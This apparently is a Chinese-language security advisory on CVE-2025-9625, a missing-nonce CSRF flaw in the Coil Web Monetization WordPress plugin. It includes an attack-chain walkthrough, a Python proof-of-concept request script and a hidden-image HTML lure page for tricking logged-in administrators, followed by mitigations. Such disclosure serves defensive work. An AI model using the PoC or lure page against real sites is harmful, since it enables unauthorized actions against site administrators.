CVE-2025-9625 WordPress Coil Web Monetization插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-9625

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Coil Web Monetization plugin for WordPress

漏洞概述

CVE-2025-9625是WordPress Coil Web Monetization插件中的一个跨站请求伪造（CSRF）漏洞。该插件用于为WordPress网站提供Web monetization功能，允许内容创作者通过加密货币微支付方式获利。漏洞存在于插件的maybe_restrict_content函数中，由于对coil-get-css-selector参数的处理缺少正确的nonce验证机制，导致攻击者可以诱导已登录的管理员用户执行未经授权的操作。具体而言，未经身份验证的攻击者可以诱骗网站管理员点击恶意链接，从而触发插件的CSS选择器检测功能。虽然此漏洞本身不直接导致敏感数据泄露或代码执行，但攻击者可利用其进行进一步的攻击活动，对网站安全构成潜在威胁。该漏洞影响插件2.0.2及以下所有版本，CVSS评分4.3，属于中等严重程度。

技术细节

该CSRF漏洞的根本原因在于Coil Web Monetization插件的maybe_restrict_content函数在处理HTTP请求参数时，未能正确实现WordPress的nonce安全验证机制。WordPress推荐使用wp_verify_nonce()或check_ajax_referer()函数来验证用户请求的合法性，以防止CSRF攻击。然而，该插件在处理coil-get-css-selector参数时缺少必要的nonce验证步骤。攻击者可以构造一个恶意请求，诱使已登录的管理员用户不知不觉地触发CSS选择器检测功能。由于WordPress管理员具有较高的权限，这种攻击可能为后续更复杂的攻击奠定基础。攻击成功的关键条件是目标网站管理员处于登录状态，并且能够被诱导点击攻击者精心构造的链接或访问包含恶意内容的页面。攻击者通常会利用社会工程学技术，如钓鱼邮件、恶意广告或社交媒体链接来实施攻击。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面或钓鱼链接，其中包含针对目标WordPress网站的自动提交请求

STEP 2

步骤2

攻击者通过社会工程学手段（如钓鱼邮件、恶意广告、社交媒体）诱骗已登录的网站管理员访问该恶意页面

STEP 3

步骤3

管理员浏览器自动向目标网站的wp-admin/admin-ajax.php端点发送包含coil-get-css-selector参数的AJAX请求

STEP 4

步骤4

由于插件缺少nonce验证，请求被服务器接受并执行，触发maybe_restrict_content函数中的CSS选择器检测逻辑

STEP 5

步骤5

攻击成功完成CSRF攻击，虽然当前漏洞影响有限，但可为后续更复杂的攻击（如存储型XSS）奠定基础

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import argparse

def exploit_csrf(target_url, admin_cookie=None):
    """
    CVE-2025-9625 CSRF PoC
    Coil Web Monetization Plugin < 2.0.3
    Missing nonce validation in maybe_restrict_content function
    """
    # Target endpoint that handles coil-get-css-selector parameter
    endpoint = target_url.rstrip('/') + '/wp-admin/admin-ajax.php'
    
    # Construct CSRF payload
    # The vulnerable parameter is 'coil-get-css-selector'
    data = {
        'action': 'coil_get_css_selector',  # AJAX action hook
        'coil-get-css-selector': 'test_selector',  # Vulnerable parameter
        'post_id': '1'  # Target post ID
    }
    
    headers = {}
    if admin_cookie:
        headers['Cookie'] = admin_cookie
    
    try:
        print(f'[*] Sending CSRF request to {endpoint}')
        response = requests.post(endpoint, data=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print(f'[+] Request sent successfully')
            print(f'[+] Response status: {response.status_code}')
            print(f'[+] Response: {response.text[:200]}')
        else:
            print(f'[-] Request failed with status: {response.status_code}')
            
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-9625 CSRF PoC')
    parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
    parser.add_argument('-c', '--cookie', help='Admin session cookie (optional)')
    args = parser.parse_args()
    
    exploit_csrf(args.url, args.cookie)

# HTML PoC page for social engineering
html_poc = '''
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Please wait while loading...</h1>
    <img src="http://target-site.com/wp-admin/admin-ajax.php?action=coil_get_css_selector&coil-get-css-selector=test" 
         style="display:none" onerror="window.close()">
    <script>
        // Automatically submit form on page load
        window.onload = function() {
            setTimeout(function() {
                window.close();
            }, 1000);
        };
    </script>
</body>
</html>
'''

影响范围

Coil Web Monetization plugin <= 2.0.2

防御指南

临时缓解措施

如果无法立即升级插件，可以采取以下临时缓解措施：1) 临时禁用Coil Web Monetization插件直到完成升级；2) 加强对管理员账户的安全教育，提醒不要点击未知来源的链接；3) 使用浏览器安全插件防止隐蔽的CSRF攻击；4) 监控服务器日志，关注异常的AJAX请求模式。建议尽快将插件升级到开发者发布的安全版本以彻底修复该漏洞。